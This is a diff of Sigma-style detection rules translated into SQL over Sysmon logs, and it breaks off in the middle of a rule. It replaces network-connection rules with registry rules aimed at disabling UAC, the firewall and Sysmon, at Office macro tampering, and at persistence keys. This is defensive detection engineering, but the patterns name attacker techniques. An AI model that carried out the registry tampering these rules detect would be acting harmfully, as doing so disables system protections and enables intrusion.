"48437c39-9e5f-47fb-af95-3d663c3f2919", "status": "experimental", - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "author": "elhoim", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "author": "frack113", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": 
"net_connection_win_susp_outbound_mobsync_connection.yml" + "filename": "registry_set_disable_uac_registry.yml" }, { - "title": "Python Initiated Connection", - "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate python script" + "Valid Macros and/or internal documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND Image LIKE '%python%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": 
"net_connection_win_python.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Disable Microsoft Defender Firewall via Registry", + "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_disable_defender_firewall.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Registry Explorer Policy Modification", + "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "status": "test", + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + 
"author": "frack113", "tags": [ - "attack.impact", - "attack.t1496" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE 
'%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_set_nopolicies_user.yml" }, { - "title": "Rundll32 Internet Connection", - "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", - "status": "test", - "description": "Detects a rundll32 that communicates with public IP addresses", - "author": "Florian Roth (Nextron Systems)", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp 
LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "net_connection_win_rundll32_net_connections.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Office Autorun Keys Modification", + "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - 
"attack.lateral_movement" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' 
ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_asep_reg_keys_modification_office.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "status": "test", - 
"description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", + "status": "experimental", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." 
+ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\edge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR Image LIKE '%\\\\Engine.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject 
LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "status": "test", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "falsepositives": [ - "Legitimate certutil network connection" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" }, { - "title": "Suspicious Non-Browser Network Communication With Reddit API", - "id": "d7b09985-95a3-44be-8450-b6eadf49833e", + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "status": "experimental", - 
"description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", - "author": "Gavin Knapp", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1102" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate applications communicating with the Reddit API e.g. web browsers not in exclusion list, app with an RSS etc." + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND DestinationHostname LIKE '%reddit.com/api%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\ExpressConnectNetworkService.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Attachments\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\HideZoneInfoOnProperties' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (TargetObject LIKE '%\\\\SaveZoneInformation' ESCAPE '\\' AND Details = 'DWORD (0x00000002)') OR (TargetObject LIKE '%\\\\ScanWithAntiVirus' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')))" ], - "filename": "net_connection_win_reddit_api_non_browser_access.yml" + "filename": 
"registry_set_policies_attachments_tamper.yml" }, { - "title": "Equation Editor Network Connection", - "id": "a66bc059-c370-472c-a0d7-f8fd1bf9d583", + "title": "Potential Persistence Via DLLPathOverride", + "id": "a1b1fd53-9c4a-444c-bae0-34a330fc7aa8", "status": "experimental", - "description": "Detects network connections from Equation Editor", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects when an attacker adds a new \"DLLPathOverride\" value to the \"Natural Language\" key in order to achieve persistence which will get invoked by \"SearchIndexer.exe\" process", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1203" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\ContentIndex\\\\Language\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\StemmerDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBDLLPathOverride%' ESCAPE '\\' OR TargetObject LIKE '%\\\\StemmerClass%' ESCAPE '\\' OR TargetObject LIKE '%\\\\WBreakerClass%' ESCAPE '\\'))" ], - "filename": "net_connection_win_eqnedt.yml" + "filename": "registry_set_persistence_natural_language.yml" }, { - "title": "Suspicious Outbound Kerberos Connection", - "id": "e54979bd-c5f9-4d6c-967b-a04b19ac4c74", - "status": "test", - "description": "Detects suspicious outbound network activity via kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.", - "author": "Ilyas Ochkov, oscd.community", + "title": "Disable Sysmon Event Logging Via Registry", + "id": "4916a35e-bfc4-47d0-8e25-a003d7067061", + "status": "experimental", + 
"description": "Detects changes in Sysmon driver altitude. If the Sysmon driver is configured to load at an altitude of another registered service, it will fail to load at boot.", + "author": "B.Talebi", "tags": [ - "attack.credential_access", - "attack.t1558", - "attack.lateral_movement", - "attack.t1550.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Web Browsers" + "Legitimate driver altitude change to hide sysmon" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '88' AND Initiated = 'true') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\lsass.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Instances\\\\Sysmon Instance\\\\Altitude' ESCAPE '\\')" ], - "filename": "net_connection_win_susp_outbound_kerberos_connection.yml" + "filename": "registry_set_change_sysmon_driver_altitude.yml" }, { - "title": "PowerShell Network Connections", - "id": "1f21ec3f-810d-4b0e-8045-322202e22b4b", - "status": "experimental", - "description": "Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. 
extend filters with company's ip range')", - "author": "Florian Roth (Nextron Systems)", + "title": "Winlogon Notify Key Logon Persistence", + "id": "bbf59793-6efb-4fa1-95ca-a7d288e52c88", + "status": "test", + "description": "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in.\nWinlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.\n", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001" + "attack.persistence", + "attack.t1547.004" ], "falsepositives": [ - "Administrative scripts", - "Microsoft IP range" + "Unknown" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE 